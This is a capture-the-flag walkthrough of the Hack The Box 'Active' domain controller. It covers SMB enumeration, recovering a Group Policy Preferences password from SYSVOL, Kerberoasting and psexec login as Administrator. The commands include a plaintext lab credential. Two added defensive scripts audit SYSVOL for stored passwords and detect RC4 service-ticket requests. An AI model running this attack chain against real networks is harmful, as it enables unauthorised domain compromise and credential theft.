HTB Series - Active

tags: htb active windows walkthrough

We start by scanning the target with nmap to find open ports:
nmap -sC -sV -oA active 10.10.10.100

Since we can see DNS (53), LDAP and SMB (445), we are likely on a Windows server.
Inspecting the output, there are no shares listed, so we can try to connect via smbclient with null authentication to enumerate them.
smbclient -L //10.10.10.100

The IPC$ and SYSVOL shares are expected of a domain controller.

Smbmap offers similar results

We note that we only have READ access for the Replication share, so we drill down further into it to look for interesting artifacts.

smbmap -H 10.10.10.100 -r Replication --depth 8 # --depth accomplishes what a recursive listing would have; 8 in this case was an estimate of how deep we would have to go.

The output shows the Groups.xml file, which is of interest to us, so we download it.

smbmap -H 10.10.10.100 -r Replication --depth 8 -A Groups.xml # -A acquires the file with the specified pattern

From the downloaded file we identify the credentials as follows:

We decrypt the password as shown:

An alternate way to get this would be to use smbclient

smbclient //10.10.10.100/Replication
Password for [WORKGROUP\cypher]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
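
The Groups.xml finding above, seen from the defender's side: Group Policy Preferences files store passwords in a `cpassword` attribute, and any copy of SYSVOL can be audited for them without decrypting anything. This is an added example, not part of the original note; the sample file, account name and GUID are constructed, and the account attribute names are matched case-insensitively as an assumption about how they are spelled across GPP file types.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Group Policy Preferences files that can carry a cpassword attribute.
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "drives.xml", "printers.xml"}

# Constructed sample; the cpassword value is a placeholder, not real ciphertext.
SAMPLE = """<?xml version="1.0" encoding="utf-8"?>
<Groups><User name="svc_example" changed="2018-01-01 00:00:00">
<Properties action="U" cpassword="CONSTRUCTED-PLACEHOLDER" userName="example.local\\svc_example"/>
</User></Groups>"""

def find_gpp_secrets(sysvol_root):
    """Walk a local copy of SYSVOL and list every stored GPP password."""
    findings = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for name in files:
            if name.lower() not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                root = ET.parse(path).getroot()
            except ET.ParseError:  # keep the file on the list for manual review
                findings.append({"file": path, "account": "<unparseable XML>",
                                 "changed": None})
                continue
            for parent in root.iter():
                for props in parent.findall("Properties"):
                    attrs = {k.lower(): v for k, v in props.attrib.items()}
                    if not attrs.get("cpassword"):
                        continue  # absent or empty: nothing stored here
                    account = (attrs.get("username") or attrs.get("accountname")
                               or attrs.get("runas") or parent.get("name"))
                    findings.append({"file": path, "account": account,
                                     "changed": parent.get("changed")})
    return findings

def demo():
    """Audit a constructed SYSVOL fragment written to a temp directory."""
    with tempfile.TemporaryDirectory() as root:
        gdir = os.path.join(root, "Policies", "{CONSTRUCTED-GUID}",
                            "MACHINE", "Preferences", "Groups")
        os.makedirs(gdir)
        with open(os.path.join(gdir, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE)
        return [(os.path.basename(f["file"]), f["account"], f["changed"])
                for f in find_gpp_secrets(root)]
```

Every account it reports should have its password rotated and the preference item removed, since the stored value is readable by anyone who can read the share.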

We then use Impacket to view the users on the domain:
GetADUsers.py -all -dc-ip 10.10.10.100 active.htb/svc_tgs

We try further enumeration using the given user account as follows:

smbmap -d active.htb -u svc_tgs -p GPPstillStandingStrong2k18 -H 10.10.10.100
# -d is for domain, -u is for user, -p is for password and -H is for host

We utilize the credentials gathered as follows:

On a Windows box, open up a session as the user:

runas /netonly /user:active.htb\svc_tgs cmd

We can use BloodHound to proceed as follows:
Use SharpHound on the Windows box

Verify the connection is working okay

Turns out we just needed to add the DC as the primary DNS in the ethernet settings.

From BloodHound we query which accounts are susceptible to Kerberoasting

Attempt at Kerberoasting

Given the acquired hash, we can consult the hashcat example hashes page to find the cracking mode to use

We can then proceed to attempt to crack the hash with hashcat
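
On the domain controller, the Kerberoasting step above shows up as Security event 4769 (service ticket requested) when Kerberos service ticket auditing is enabled. The following added example, which is not part of the original note, flags successful RC4 ticket requests for services that run under user accounts; the JSON-lines export format and every sample value, including the source address, are constructed assumptions.

```python
import json
from collections import defaultdict

RC4_HMAC = 0x17  # AES tickets use 0x11 / 0x12

# Constructed sample: event 4769 fields exported as one JSON object per line.
SAMPLE_EVENTS = """\
{"EventID": 4769, "TargetUserName": "svc_tgs@ACTIVE.HTB", "ServiceName": "Administrator", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:10.10.14.5"}
{"EventID": 4769, "TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "DC$", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:10.10.10.50"}
{"EventID": 4769, "TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:10.10.10.50"}
{"EventID": 4769, "TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "svc_sql", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:10.10.10.50"}
{"EventID": 4624, "TargetUserName": "jdoe", "LogonType": 3}
not json at all
"""

def rc4_service_ticket_requests(lines):
    """Map each requesting account to the user-run services it got RC4 tickets for."""
    hits = defaultdict(set)
    for line in lines:
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip blank or malformed lines
        if not isinstance(ev, dict) or ev.get("EventID") != 4769:
            continue
        if ev.get("Status") != "0x0":
            continue  # failed requests issued no ticket
        svc = str(ev.get("ServiceName", ""))
        if not svc or svc.endswith("$") or svc.lower() == "krbtgt":
            continue  # machine accounts and the TGS itself are not roastable targets
        try:
            etype = int(str(ev.get("TicketEncryptionType", "")), 16)
        except ValueError:
            continue
        if etype == RC4_HMAC:
            hits[ev.get("TargetUserName", "?")].add(svc)
    return {user: sorted(svcs) for user, svcs in hits.items()}

if __name__ == "__main__":
    for user, services in rc4_service_ticket_requests(SAMPLE_EVENTS.splitlines()).items():
        print(f"{user} requested RC4 tickets for: {', '.join(services)}")
```

In an environment where AES is the norm, a single account collecting RC4 tickets for several user-run services in a short period is the pattern worth alerting on.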

We then proceed to use the credentials acquired to log in as the Administrator via psexec:
psexec.py domain/User@ip

Own the root flag
